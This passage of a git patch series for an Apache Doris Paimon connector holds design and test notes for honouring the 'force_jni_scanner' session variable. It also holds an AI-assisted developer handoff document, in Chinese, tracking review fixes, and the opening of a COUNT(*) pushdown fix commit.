new 2nd arg; + - `:509-511` widen `shouldUseNativeReader` to 3 args + update its javadoc (`:492-508`) to note the session escape hatch (legacy parity `:430`); + - `:436` add `&& !isForceJniScannerEnabled(session)` + refresh the comment. +2. Update the 3 existing `shouldUseNativeReader` test calls (`:206/222/231`) → add `/*forceJniScanner*/ false`. + +## Risk Analysis +- **Default-off:** `force_jni_scanner` defaults `false`; absent/empty/null → `false` (null-guard). Normal reads route exactly as today. Zero regression risk on the default path. +- **`fuzzy=true`** (`SessionVariable.java:2880`, same as `enable_paimon_cpp_reader`): under fuzzed/random-session regression runs the var may flip true → any live e2e asserting *native*-path behavior must set `force_jni_scanner=false` explicitly. Harness property of both vars, not a connector defect; noted for the e2e author. +- **Site B null-session:** existing `getScanNodePropertiesSkipsSchemaEvolutionForNonFileStoreTable` passes `session=null`; null-guarded helper → `!isForceJniScannerEnabled(null) == true` → test stays green (verified, no NPE). +- **binlog/audit_log:** `forceJni` is OR-sibling, never replaced → name-force routing intact. + +## Test Plan + +### Unit Tests (offline FE, `PaimonScanPlanProviderTest`) +1. **`isForceJniScannerEnabledReadsSessionProperty`** (clone of `isCppReaderEnabledReadsSessionProperty`): assert `true` for `{"force_jni_scanner":"true"}`, `false` for `"false"`, `false` for empty map ("absent ⇒ default false"), `false` for null session. WHY: pins the exact key + default-false + null-safety that routing hinges on. RED-MUTATION: wrong key / default-true → flips → red. +2. **`forceJniScannerRoutesNativeEligibleSplitToJni`**: `assertFalse(shouldUseNativeReader(/*forceJni*/ false, /*forceJniScanner*/ true, Optional.of([parquetRawFile(...)])))`. WHY: with `force_jni_scanner=true`, a native-eligible normal-table split must route to JNI (legacy parity `:430`). RED-MUTATION: drop `!forceJniScanner` → returns native → red. +3. **Updated existing 3** (`forceJniSysTable…`, `nonForcedSplitWithRawFiles…`, `nonForcedSplitWithoutNativeFiles…`): add `false` for the new param. The `(false,false,native)→native` and `(true,_,native)→JNI` cases stay pinned; regression guard that the widened signature didn't perturb routing. + +### Site B test coverage (honest limitation — Rule 12) +A dedicated red-before/green-after for the schema-evolution *emit suppression* is **not feasible offline**: `buildSchemaEvolutionParam` requires a real `FileStoreTable` with a `SchemaManager`, but the offline harness only has `FakePaimonTable` (returns empty dict regardless), matching the suite's deliberate offline-pure convention. So dropping the Site B gate would not turn any offline test red. Site B is therefore covered by: (a) the shared `isForceJniScannerEnabled` helper test (its only variable term), (b) code inspection + BE-source evidence of correctness-neutrality, (c) the gated live e2e. Stated explicitly rather than claimed. + +### E2E Tests (CI-gated, live paimon — not run here) +`SET force_jni_scanner=true; SELECT * FROM ` → reader=JNI (vs native when false). Real escape-hatch behavior is a **live-e2e-only** gate; no offline harness drives BE reader selection. Not added as a new suite (no live paimon fixture in this branch); noted as the true end-to-end check. + +## SPI / docs impact +- **None to SPI/RFC** — pure connector, no `ConnectorContext`/`Connector` surface change. +- No `decisions-log` entry (scope was unambiguous; the 3rd-param-vs-OR choice is an internal engineering call, recorded here). +- No `deviations-log` entry — the fix achieves **full legacy parity** for `force_jni_scanner` routing; Site B is connector-specific (legacy has no schema-evolution dict) and is correctness-neutral, not a parity deviation. From 4db0f0b07d6358f8410f564e1d4453d7a0b83ddd Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 08:53:38 +0800 Subject: [PATCH 027/128] docs: checkpoint #7 FIX-FORCE-JNI-SCANNER done; hand off #8 FIX-COUNT-PUSHDOWN (P2, ask scope first) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - task-list: #7 row → ✅ design/impl/build(250/0/0)/commit `05132a42668` + DONE detail. - HANDOFF: #7 summary (3rd-param overrides synthesizer call-site-OR per Rule 9; Site B correctness-neutral, no offline red test honestly noted); next = #8/#9 P2 perf-parity → AskUserQuestion for scope (accept-or-defer) BEFORE implementing. Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 68 ++++++++++++------------ plan-doc/task-list-P5-rereview2-fixes.md | 3 +- 2 files changed, 37 insertions(+), 34 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 0483c56d842fcc..a8fc044de7f08b 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,35 +5,38 @@ --- -# 🎯 下一个 session 的任务 — **逐一修复 paimon connector 第二轮 review 的问题(#1~#6 已完成 → 从 #7 起)** +# 🎯 下一个 session 的任务 — **逐一修复 paimon connector 第二轮 review 的问题(#1~#7 已完成 → 从 #8 起)** 第二轮 clean-room 对抗 review report:[`plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md`](./reviews/P5-paimon-rereview2-2026-06-11.md)。 👉 **任务清单(按优先级):[`plan-doc/task-list-P5-rereview2-fixes.md`](./task-list-P5-rereview2-fixes.md)** —— 逐条含 finding 引用、连接器 `file:line`、legacy parity 锚、fix sketch、SPI 影响、测法。 -## ✅ 已完成(P0 BLOCKER 全清 + P1 #5、#6) +## ✅ 已完成(P0 BLOCKER 全清 + P1 MAJOR #5/#6/#7 全清) - **#1 `FIX-URI-NORMALIZE`**(B-7DF/DV)`20b19d19dd8` —— native 数据文件 + DV 路径 scheme 归一化。新 SPI `ConnectorContext.normalizeStorageUri`。 - **#2 `FIX-STATIC-CREDS-BE`**(B-9)`d23d5df9914` —— 静态 object-store 凭据→BE canonical `AWS_*`。新 SPI `ConnectorContext.getBackendStorageProperties`。 - **#3 `FIX-SCHEMA-EVOLUTION`**(B-1a;M-10 deferred)`667f779af04` —— 连接器直建 thrift schema 字典(Design C,零新 SPI)。 - **#4 `FIX-JDBC-DRIVER-URL`**(B-8a + B-8b)`2d15b1b7ed7` —— driver_url resolve+别名+CREATE-time 校验(纯连接器,零新 SPI;[D-050]/[DV-028]/[DV-029])。 - **#5 `FIX-MAPPING-FLAG-KEYS`**(M-crit)`9dcf6d1a9e5` —— 连接器读 canonical 点分 mapping-flag 键(纯连接器,零 SPI;paimon-only,hive/iceberg 登 [DV-030])。 -- **#6 `FIX-KERBEROS-DOAS`**(M-8 + M-11;本 session)`2b1442fa57a` —— 见下。 - -### #6 摘要(本 session)`FIX-KERBEROS-DOAS` —— commit `2b1442fa57a` -- **两半,均 Kerberos-only**(simple-auth 上 no-op authenticator 与真 authenticator 行为一致、无回归): - - **M-8(fe-core,filesystem+jdbc)**:翻闸后这两 flavor 在 Kerberized HDFS 上丢 UGI `doAs`——连接器 `PaimonConnector.createCatalog:194` 已把建 catalog 包进 `executeAuthenticated`,但其背后 authenticator 是**基类 no-op**:HDFS `HadoopExecutionAuthenticator` 仅在 `initializeCatalog()`(`PaimonFileSystemMetaStoreProperties:46`/`PaimonJdbcMetaStoreProperties:120`) 内建,而该方法在翻闸路径**死代码**(唯一 live 调用方=legacy `PaimonExternalCatalog:147`)→ `PluginDrivenExternalCatalog.initPreExecutionAuthenticator:130` 读到 `AbstractPaimonProperties:45` no-op。HMS 不受影响(`initNormalizeAndCheckProps:70` 即建,必跑)。**DLF/REST 排除**(DLF 用 Aliyun STS 非 Kerberos UGI、无 doAs 可丢;review「DLF」从句 **overstated**,已核)。 - - **M-11(连接器)**:metadata **读** RPC(listDatabases/getDatabase/listTables/getTable[getTableHandle+getSysTableHandle+resolveTable]/listPartitions)**不**包 `executeAuthenticated`,仅 4 DDL op 包(B3 **D7=B** 故意 read-vs-DDL 不对称)→ Kerberos HMS 上读跑在 catalog principal 之外。 -- **用户签字(本 session 两决策)**:**M-11 = full legacy parity 包全部 read RPC**([D-052],**取代 D7=B 的 read 从句**;legacy 本就包每个 read,仅包 listPartitions 是半吊子);**M-8 = fix-now fe-core,filesystem+jdbc only**([D-053])。 -- **修**:M-8 = 新 fe-core hook `MetastoreProperties.initExecutionAuthenticator(List)`(default no-op)由 `PluginDrivenExternalCatalog.initPreExecutionAuthenticator` 用已安全建好的 `getOrderedStoragePropertiesList()` 调;filesystem/jdbc override 经 `AbstractPaimonProperties.initHdfsExecutionAuthenticator` 共享 helper 建 HDFS authenticator(镜像 HMS)——**零连接器改、非连接器 SPI**(`ConnectorContext`/`Connector` 表面未改,RFC 无须改)。M-11 = 7 处 read site 包 `context.executeAuthenticated`,`resolveTable`(metadata+scan 双 site)一处覆盖所有调用方(DRY)。**异常流关键**:Kerberos `UGI.doAs` 把 checked `Catalog.{Table,Database}NotExistException` 包成 `UndeclaredThrowableException`(仅 IOException/RuntimeException/Error 透传)→ domain 异常**必须在 lambda 内**捕获(镜像 legacy `getPaimonPartitions:104`);scan `resolveTable` 对 `context==null`(2-arg ctor 离线测)走直连,同 `getScanNodeProperties` 既有约定。 -- **验证**:连接器模块 **248/0/0**(1 CI-gated skip)、fe-core metastore-props **21/0/0**(含 DLF/HMS regression-clean)、checkstyle 0、import-gate 净;**fail-before 双向红**(M-8 留 no-op `AbstractPaimonProperties$1`;M-11 3 测 authCount/log-empty 向红)。**真 doAs 端到端=live-Kerberos-e2e only**(无 paimon-kerberos 套件,[DV-031])。设计 [`P5-fix-KERBEROS-DOAS-design.md`](./tasks/designs/P5-fix-KERBEROS-DOAS-design.md)。 - -## 🔜 下一个 session:从 **#7 `FIX-FORCE-JNI-SCANNER`** 起,按 task-list 顺序续修 -> ⚠️ **先拿当前代码复核 finding**(review 只读,行号可能漂移;#6 改过 `PaimonConnectorMetadata`/`PaimonScanPlanProvider`/`PaimonScanPlanProviderTest`,#3/#4/#5 亦改过 scan provider)。 - -**#7 `FIX-FORCE-JNI-SCANNER`(M-1,MAJOR,纯连接器,no SPI)**: -- **根因**:连接器只读 `paimonHandle.isForceJni()`(binlog/audit_log 的 NAME-forced 标志),**从不**读 session var `force_jni_scanner`;ORC/Parquet 永远走 native。JNI 逃生舱(用于绕开 native-reader bug,含 B2 schema-evolution 那类)丢失。 -- **连接器**:`PaimonScanPlanProvider.java:261,439-441`(`shouldUseNativeReader`)。**legacy**:`source/PaimonScanNode.java:361,430`(`sessionVariable.isForceJniScanner()` gate)。 -- **Fix sketch**:从 session-properties map 读 `force_jni_scanner`(该 var 已在 map 里——连接器读 sibling `enable_paimon_cpp_reader` 即出自此),set 时把所有 data split 路由到 JNI。纯连接器、无 SPI、无 BE。真值闸=live e2e(CI-gated)。 -- ⚠️ **scope 无须问用户**(明确 MAJOR、纯连接器、无歧义);直接按 per-fix 流程修。 +- **#6 `FIX-KERBEROS-DOAS`**(M-8 + M-11)`2b1442fa57a` —— M-8 fe-core fs/jdbc authenticator 接线 + M-11 全 read RPC 包 `executeAuthenticated`(full legacy parity [D-052]/[D-053];DLF 从句证伪 overstated;[DV-031])。 +- **#7 `FIX-FORCE-JNI-SCANNER`**(M-1;本 session)`05132a42668` —— 见下。 + +### #7 摘要(本 session)`FIX-FORCE-JNI-SCANNER` —— commit `05132a42668` +- **根因**:翻闸连接器 split router 只读 NAME 派生的 `paimonHandle.isForceJni()`(binlog/audit_log 名钉),**从不**读 session var `force_jni_scanner` → ORC/Parquet 永走 native;legacy 的 JNI 逃生舱(`SET force_jni_scanner=true`,用于绕 native-reader bug 含 B2 schema-evolution 那类)静默丢失。连接器只移植 legacy 三 conjunct 中的两个(`PaimonScanNode.java:430`:`!forceJniScanner && !forceJniForSystemTable && supportNativeReader`),丢的 `!forceJniScanner` 即 M-1。 +- **修**(纯连接器、**零 SPI**、无 fe-core import、无 BE param —— legacy 也不序列化此 var): + - 新 `isForceJniScannerEnabled(session)`:逐字镜像 `isCppReaderEnabled`,读 key `force_jni_scanner`(byte-identical to `SessionVariable.FORCE_JNI_SCANNER`,同 `VariableMgr.toMap` 通道);null-guard,默认 false(legacy 默认)。 + - **Site A**(correctness,`PaimonScanPlanProvider.java:295`):`shouldUseNativeReader` 加显式 `forceJniScanner` 形参(1:1 镜像 legacy 三-boolean 闸),`planScan` 传 `isForceJniScannerEnabled(session)`。**handle 名钉是 OR-sibling,绝不替换**(binlog/audit_log 路由不变)。 + - **Site B**(correctness-NEUTRAL,`:436`):force-JNI 时抑制 native-only `paimon.schema_evolution` 字典(BE 仅在 native ORC/Parquet range 消费它,JNI/cpp reader 全忽略——核 `paimon_reader.cpp:51-54,188-191` / `file_scanner.cpp:1045-1058`);对齐连接器自身注释契约。 +- **关键设计定夺(本 session,内部工程判断,无须用户签字)**:`shouldUseNativeReader` 用**显式 3rd 形参**而非 call-site OR——**推翻 workflow synthesizer 的 call-site-OR 建议,采 legacy-parity scout**。理由:`force_jni_scanner` 是与既有 `forceJni`(=`forceJniForSystemTable`)语义并列的**路由**输入(legacy `:430` 即两 sibling boolean 同闸),call-site OR 会让新维度只能经 helper 的**字符串解析**测,而那测**routing 逻辑变了也不会红**(违 Rule 9);3rd 形参让 `shouldUseNativeReader(false, true, native-eligible)==JNI` 成 mutation-tested 事实。`cppReader=isCppReaderEnabled(session)`(序列化格式 flag,非路由)不是正确类比。 +- **验证**:连接器模块 **250/0/0**(1 CI-gated live skip = `PaimonLiveConnectivityTest`)、import-gate 净、checkstyle 0;**fail-before 双向红**(neuter 丢 conjunct + helper return-false → 恰两新测红、其余 31 绿)。真 BE reader 选择 = **live-e2e only**(无离线 harness 驱动 BE reader 选择)。设计 [`P5-fix-FORCE-JNI-SCANNER-design.md`](./tasks/designs/P5-fix-FORCE-JNI-SCANNER-design.md)。 +- **Site B 测覆盖诚实声明**(Rule 12):emit-suppression **无专属离线 red 测**——`buildSchemaEvolutionParam` 需真 `FileStoreTable`+`SchemaManager`,离线 harness 只有 `FakePaimonTable`(恒返空字典),故撤 Site B 闸不会红任何离线测。Site B 由:① 共享 `isForceJniScannerEnabled` helper 测(其唯一变量项)② BE-源 correctness-neutral 证据 ③ CI-gated live-e2e 覆盖。 + +## 🔜 下一个 session:从 **#8 `FIX-COUNT-PUSHDOWN`** 起 —— ⚠️ **P2 严重度有争议,动手前先问用户定 scope** +> ⚠️ **先拿当前代码复核 finding**(review 只读,行号已漂移;#7 改过 `PaimonScanPlanProvider`,#3/#4/#6 亦改过 scan provider/metadata)。 + +**#8 `FIX-COUNT-PUSHDOWN`(M-2,round-2=MAJOR / round-1=MINOR,perf-parity)**: +- **根因**:`COUNT(*)` 下推对该 node **仍 ENABLED**(`PhysicalPlanTranslator.java:873`),但连接器**从不**算 `mergedRowCount` 也不 emit `paimon.row_count` → `table_level_row_count=-1` → BE 回退(`paimon_jni_reader.cpp:104`、`file_scanner.cpp:1298-1326`)**物化 merge 后全行**去 count(PK 表 merge/delete 尤贵)。**结果正确,仅性能回归。** +- **连接器**:`PaimonScanPlanProvider.java:186-296`(无 count 分支)。**legacy**:`source/PaimonScanNode.java:396,421-429,483-495,303-308`(`applyCountPushdown` + `dataSplit.mergedRowCount()`,在 native/JNI 闸**之前**短路)。 +- **#9 `FIX-NATIVE-SUBSPLIT`(M-3,同 perf-parity)**:一个 split/RawFile,大 ORC/Parquet 单 scanner;`PaimonScanPlanProvider.java:263-286` vs `source/PaimonScanNode.java:434-465`(`determineTargetFileSplitSize`+`fileSplitter.splitFile`)。 +- ⚠️ **#8/#9 都是结果正确、仅 perf/并行** → **动手前用 `AskUserQuestion` 找用户定 scope**(accept-or-defer;defer 则登 `deviations-log.md`,**勿**默认实现)。这与 #7(明确 MAJOR、无歧义、直接修)不同。 每条遵循项目既定 per-fix 流程(`step-by-step-fix` skill):1) 设计 doc → `plan-doc/tasks/designs/P5-fix--design.md`;2) **先拿当前代码复核 finding**;3) 实现(minimal、surgical、**连接器禁 import fe-core**);4) build+UT(绝对 `-f`、**`-am`** 必带、读 surefire XML + `MVN_EXIT`、加 fail-before/pass-after UT);5) **独立 commit**;6) SPI 改动登 `01-spi-extensions-rfc.md`、用户签字入 `decisions-log.md`、偏差入 `deviations-log.md`、同步 task-list。 @@ -42,35 +45,34 @@ | 层 | 条目 | 说明 | |---|---|---| | **P0 BLOCKER(挡 commit)** | ✅1.URI-NORMALIZE · ✅2.STATIC-CREDS-BE · ✅3.SCHEMA-EVOLUTION · ✅4.JDBC-DRIVER-URL | **全清** | -| **P1 MAJOR(修或显式接受)** | ✅5.`FIX-MAPPING-FLAG-KEYS`(M-crit) · ✅6.`FIX-KERBEROS-DOAS`(M-8+M-11) · **⬜7.`FIX-FORCE-JNI-SCANNER`(M-1)** | #6 已修(M-11 full parity 取代 D7=B read 从句 [D-052];M-8 fs/jdbc only [D-053];DLF 从句证实 overstated)。#7 纯连接器、scope 无歧义、直接修。 | -| **P2 严重度有争议(perf;R1=MINOR)** | 8.`FIX-COUNT-PUSHDOWN`(M-2) · 9.`FIX-NATIVE-SUBSPLIT`(M-3) | 结果正确仅性能/并行。**动手前先找用户定 scope**(accept-or-defer,defer 则登 `deviations-log`)。 | -| **P3 覆盖缺口(去查)** | 复验 `FIX-HMS-CONFRES` · DDL 写路径 parity · ANALYZE/列统计 · split-count 计账 · 跨连接器 follow-up([DV-028]/[DV-030]/**[DV-031]**) | critic 标本轮未追;查出真分歧才转 FIX。 | +| **P1 MAJOR(修或显式接受)** | ✅5.`FIX-MAPPING-FLAG-KEYS` · ✅6.`FIX-KERBEROS-DOAS` · ✅7.`FIX-FORCE-JNI-SCANNER` | **全清**。#7 纯连接器零 SPI,3rd-param 推翻 synthesizer call-site-OR(Rule 9),Site B correctness-neutral。 | +| **P2 严重度有争议(perf;R1=MINOR)** | ⬜8.`FIX-COUNT-PUSHDOWN`(M-2) · ⬜9.`FIX-NATIVE-SUBSPLIT`(M-3) | 结果正确仅性能/并行。**动手前先 `AskUserQuestion` 定 scope**(accept-or-defer,defer 则登 `deviations-log`)。 | +| **P3 覆盖缺口(去查)** | 复验 `FIX-HMS-CONFRES` · DDL 写路径 parity · ANALYZE/列统计 · split-count 计账 · 跨连接器 follow-up([DV-028]/[DV-030]/[DV-031]) | critic 标本轮未追;查出真分歧才转 FIX。 | | **P4 MINOR/NIT** | 见 review §5 | 一次性 cleanup;唯一真实数据边 = partition null-sentinel(`__HIVE_DEFAULT_PARTITION__`/`\N` 字面值被当 NULL)。 | --- # 📦 仓库状态 -- **HEAD = `2b1442fa57a`**(`fix: FIX-KERBEROS-DOAS`,本 session #6)。该 fix commit = 连接器(2 main+2 test)+fe-core(5 main+2 test)+设计 doc+D-052/D-053+DV-031+task-list 进度(15 文件,无 regression-conf/scratch/HANDOFF)。 -- **本 checkpoint commit 改动**:`plan-doc/HANDOFF.md`(本文件)、`plan-doc/task-list-P5-rereview2-fixes.md`(#6 commit-cell 填 hash)。 +- **HEAD = 本 checkpoint commit**(更新 task-list #7 进度+hash、HANDOFF)。其父 = `05132a42668`(`fix: FIX-FORCE-JNI-SCANNER`,本 session #7)。该 fix commit = 连接器(1 main+1 test)+设计 doc(3 文件,无 regression-conf/scratch/HANDOFF)。 - ⚠️ **`regression-test/conf/regression-conf.groovy` 仍 modified-未 commit 且含明文 Aliyun key** —— 任何 commit 前继续 path-whitelist,**严禁 `git add -A`**。`regression-conf.groovy.bak` 同理排除。 - scratch 仍未 commit(`.audit-scratch/` `conf.cmy/` `META-INF/`)。 - 当前分支 `catalog-spi-07-paimon`(非 `master`)→ 在此 commit 修复 OK。 - **legacy `datasource/paimon/*` 仍在树内**(B8 删除未做)→ 每个 fix 都能 side-by-side diff 做 parity。 -- 迁移链:…→`2d15b1b7ed7`(#4)→`9dcf6d1a9e5`(#5)→`2b1442fa57a`(#6 KERBEROS-DOAS, HEAD)。 +- 迁移链:…→`9dcf6d1a9e5`(#5)→`2b1442fa57a`(#6 KERBEROS-DOAS)→`05132a42668`(#7 FORCE-JNI-SCANNER)→本 checkpoint(HEAD)。 ## ⚠️ Commit 须知(任何 `git add` 前必读) - **硬前置**:scrub `regression-test/conf/regression-conf.groovy`(明文 Aliyun key)+ 清 scratch(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。**path-whitelist `git add`,严禁 `git add -A`。** - 每个 fix 独立 commit;message = `fix: ` + 根因 + 解法 + 测试,末尾带 `Co-Authored-By: Claude Opus 4.8 (1M context) `。 -- 改 fe-core/SPI 的 fix:commit 须含连接器 + fe-core 两侧 + 测试(#6 含 fe-core authenticator 接线 + 连接器 read-wrap)。 +- 改 fe-core/SPI 的 fix:commit 须含连接器 + fe-core 两侧 + 测试。#7 纯连接器,单侧。 ## ⚙️ 操作须知(复用) -- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。**`-am` 必带**。`-pl :fe-connector-paimon -am` **不重编 fe-core**;改 fe-core 须单独 `-pl :fe-core -am`。**checkstyle 绑在 fe-core `test` build**(#6 临时 neuter 写 `if (true) { return; }` 触 LeftCurly 挂 build,须 checkstyle-clean 的 neuter)。 +- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。**`-am` 必带**。`-pl :fe-connector-paimon -am` **不重编 fe-core**;改 fe-core 须单独 `-pl :fe-core -am`。**checkstyle**:连接器模块可单独 `mvn -pl :fe-connector-paimon checkstyle:check`(#7 已用,exit 0 即净);fe-core checkstyle 绑在其 `test` build(neuter 须 checkstyle-clean)。 - 连接器禁 import fe-core:`bash tools/check-connector-imports.sh`(仅允许 `org.apache.doris.{thrift,connector,extension,filesystem}`)。 - cwd 跨 Bash 调用持久,`cd` 破相对路径 → 一律绝对路径。 -- 测试优先 runnable FE **单测**(连接器 harness:`RecordingConnectorContext`(`failAuth`/`authCount`)/`RecordingPaimonCatalogOps`(读 log)/`FakePaimonTable`/`PaimonConnectorMetadataReadAuthTest`/`PaimonScanPlanProviderTest`;fe-core metastore-props 用 `MetastoreProperties.create`+`StorageProperties.createAll` 离线);live-e2e(S3/OSS/REST/JDBC/**Kerberos**)CI-gated → 注明 gated,勿谎称跑过。 +- 测试优先 runnable FE **单测**(连接器 harness:`RecordingConnectorContext`/`RecordingPaimonCatalogOps`/`FakePaimonTable`/`PaimonScanPlanProviderTest`;离线**无 FileStoreTable**——`FakePaimonTable.newReadBuilder()` 抛、`buildSchemaEvolutionParam` 返空,故 native-path/schema-dict emit 的正向路径不可离线驱动,纯静态 seam(`shouldUseNativeReader`/`isForceJniScannerEnabled`)才可测);live-e2e CI-gated → 注明 gated,勿谎称跑过。 ## 🧠 给下一个 agent 的 meta -- **#6 验证的高价值模式(再次奏效)**:finding → **5-agent scout workflow 独立复核**(M-8 flow / M-8 legacy / M-11 read-sites / DLF+D7 / scope+test)+ **对抗 synthesizer** → 框定 2 个 scope 决策问用户(`AskUserQuestion`)→ 设计 → 实现 → **fail-before 实测**(neuter wrap、跑两测、向红)→ pass-after。本次 scout 揪出 finding 没说的关键事实:① M-8 不是「缺 wrap」而是「wrap 背后 authenticator 是 no-op」(connector 已 wrap、fe-core 才是 seam)② legacy 包**所有** read(getTable+listPartitions+…)非仅 listPartitions → 决定 M-11 scope ③ DLF 从句 overstated(DLF 无 Kerberos)④ **Kerberos `UGI.doAs` 包 checked 异常成 `UndeclaredThrowableException`** → domain 异常必须 lambda 内捕获。 -- **改 fe-core handle/scan 流前,先 grep 全 `metadata.getTableHandle` / scan-node 调用方**(历史教训)。 -- **#7 纯连接器、scope 无歧义**(明确读 session `force_jni_scanner` 路由 JNI)→ 直接修,无须问用户。**P2(#8/#9)严重度有争议 → 先找用户定 scope 再动手**。 -- **跨连接器 follow-up 累积**:[DV-028](#4 CREATE-time-only 校验)+ [DV-030](#5 mapping-flag 键)+ **[DV-031](#6 read-vs-DDL doAs + 翻闸-authenticator-wiring,hudi/iceberg 同样复发)** —— 将来批量 close 时三者同属「新连接器读法/翻闸 vs fe-core 既有约定」类缝。 +- **#7 验证的高价值模式(再次奏效)**:finding → **4-scout + 对抗 synthesizer workflow 独立复核**(sites / legacy-parity / session-plumbing / BE+test-safety)→ 设计 → 实现 → **fail-before 实测**(neuter conjunct+helper、跑测、双向红)→ pass-after。**本次关键:复核 synthesizer 自身的判断**——synthesizer 选 call-site-OR(求最小 churn),但 legacy-parity scout 选 3rd-param(求 routing 可 mutation-test);我**站 scout 推翻 synthesizer**(Rule 9:测须能在 routing 逻辑变时红)。教训=**别盲从 synthesizer,交叉核其理由**。 +- **改 fe-core handle/scan 流前,先 grep 全 `metadata.getTableHandle` / scan-node 调用方**(历史教训)。#7 纯连接器无此风险。 +- **#8/#9 = P2 perf-parity,severity 有争议 → 动手前先 `AskUserQuestion` 定 scope**(与 #7 无歧义直接修不同)。accept→修;defer→登 `deviations-log` 勿默认实现。 +- **跨连接器 follow-up 累积**:[DV-028](#4 CREATE-time-only 校验)+ [DV-030](#5 mapping-flag 键)+ [DV-031](#6 read-vs-DDL doAs + 翻闸-authenticator-wiring)—— 三者同属「新连接器读法/翻闸 vs fe-core 既有约定」类缝,hudi/iceberg 同样复发,将来批量 close。#7 无新增 DV(full parity,Site B 是连接器自有非 legacy 偏差)。 diff --git a/plan-doc/task-list-P5-rereview2-fixes.md b/plan-doc/task-list-P5-rereview2-fixes.md index 359291562f25de..24e9e755d6cb1d 100644 --- a/plan-doc/task-list-P5-rereview2-fixes.md +++ b/plan-doc/task-list-P5-rereview2-fixes.md @@ -29,7 +29,7 @@ | 4 | FIX-JDBC-DRIVER-URL | BLOCKER | B-8a + B-8b | resolve+alias `jdbc.driver_url` for BE; enforce security allow-list | no² | ✅ | ✅ | ✅ 232/0/0 | ✅ `2d15b1b7ed7` | | 5 | FIX-MAPPING-FLAG-KEYS | MAJOR | M-crit | dotted-vs-underscore type-mapping flag keys (wrong type) | no | ✅ | ✅ | ✅ 234/0/0 | ✅ `9dcf6d1a9e5` | | 6 | FIX-KERBEROS-DOAS | MAJOR | M-8 + M-11 | M-8: wire HDFS authenticator for fs/jdbc (fe-core); M-11: wrap ALL read RPCs in `executeAuthenticated` (connector, full legacy parity) | no³ | ✅ | ✅ | ✅ 248/0/0 + 21/0/0 | ✅ `2b1442fa57a` | -| 7 | FIX-FORCE-JNI-SCANNER | MAJOR | M-1 | honor `force_jni_scanner` session var on connector scan | no | ⬜ | ⬜ | ⬜ | ⬜ | +| 7 | FIX-FORCE-JNI-SCANNER | MAJOR | M-1 | honor `force_jni_scanner` session var on connector scan | no | ✅ | ✅ | ✅ 250/0/0 | ✅ `05132a42668` | | 8 | FIX-COUNT-PUSHDOWN | MAJOR* | M-2 | FE-computed `mergedRowCount` / `paimon.row_count` (perf) | maybe | ⬜ | ⬜ | ⬜ | ⬜ | | 9 | FIX-NATIVE-SUBSPLIT | MAJOR* | M-3 | native ORC/Parquet sub-file splitting (parallelism) | maybe | ⬜ | ⬜ | ⬜ | ⬜ | @@ -97,6 +97,7 @@ Legend: ⬜ todo / 🔄 in progress / ✅ done - **Finding**: M-1. Connector reads only `paimonHandle.isForceJni()` (binlog/audit flag), never the session `force_jni_scanner`; native always chosen for ORC/Parquet. The JNI escape hatch (used to dodge native-reader bugs — incl. the B2 schema-evolution one) is gone. - **Connector**: `PaimonScanPlanProvider.java:261,439-441` (`shouldUseNativeReader`). **Legacy**: `source/PaimonScanNode.java:361,430` (`sessionVariable.isForceJniScanner()` gate). - **Fix sketch**: read `force_jni_scanner` from the session-properties map (the var is already in it — connector reads sibling `enable_paimon_cpp_reader` from there) and route all data splits to JNI when set. Pure connector. +- **✅ DONE** `05132a42668` (design [`P5-fix-FORCE-JNI-SCANNER-design.md`](./tasks/designs/P5-fix-FORCE-JNI-SCANNER-design.md)). Re-verified vs current code (4-scout + synthesizer workflow); finding confirmed, current sites = `PaimonScanPlanProvider.java:295` (router) + `:436` (schema-evo emit gate). **Site A** (correctness): new `isForceJniScannerEnabled(session)` (mirror of `isCppReaderEnabled`, key `force_jni_scanner`) → `shouldUseNativeReader` gains an explicit `forceJniScanner` param (mirrors legacy's 3-boolean gate `PaimonScanNode.java:430` 1:1; handle name-force is OR-sibling, never replaced). **Site B** (correctness-neutral): suppress the native-only `paimon.schema_evolution` dict when force-JNI (BE consumes it only on native ORC/Parquet ranges — verified `paimon_reader.cpp`/`file_scanner.cpp:1045-1058`). Pure connector, **zero SPI**, no fe-core import, no BE param (legacy serializes none). UT 250/0/0 (+1 CI skip), fail-before two-test-red verified, import-gate + checkstyle clean. Real BE reader selection = CI-gated live-e2e only. --- From 09f28cd7395b0f39e2cbe211faeb8c3f6ff4f979 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 10:06:51 +0800 Subject: [PATCH 028/128] =?UTF-8?q?fix:=20FIX-COUNT-PUSHDOWN=20=E2=80=94?= =?UTF-8?q?=20emit=20precomputed=20merged=20row=20count=20for=20COUNT(*)?= =?UTF-8?q?=20on=20plugin=20paimon=20(M-2)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: after cutover, COUNT(*) over a plugin-driven paimon table is result-correct but slow. The COUNT enum already reaches BE (FileScanNode.toThrift:90; PhysicalPlanTranslator:873 sets it on the plugin node, not excluded) and the per-range emit seam is already built (PaimonScanRange.Builder.rowCount -> paimon.row_count -> setTableLevelRowCount, byte-identical to legacy PaimonScanNode:303-308). The missing half is the signal + compute: DataSplit.mergedRowCount() is paimon-SDK-only (connector), and the getPushDownAggNoGroupingOp()==COUNT signal lives only on the fe-core node and reached nobody. So every split carried table_level_row_count=-1 and BE materialized the full post-merge row set just to count (file_scanner.cpp: 1298-1326) — costly on PK/MOR tables. Not pure-connector: the signal must cross the SPI boundary. Threading it via ConnectorSession (the FIX-FORCE-JNI precedent) was rejected — the agg-op is a per-query planner output, not a SET-variable, and would be a silent untyped channel. Solution (3 files; user signed off, D-054): - SPI (ConnectorScanPlanProvider): new default planScan overload carrying 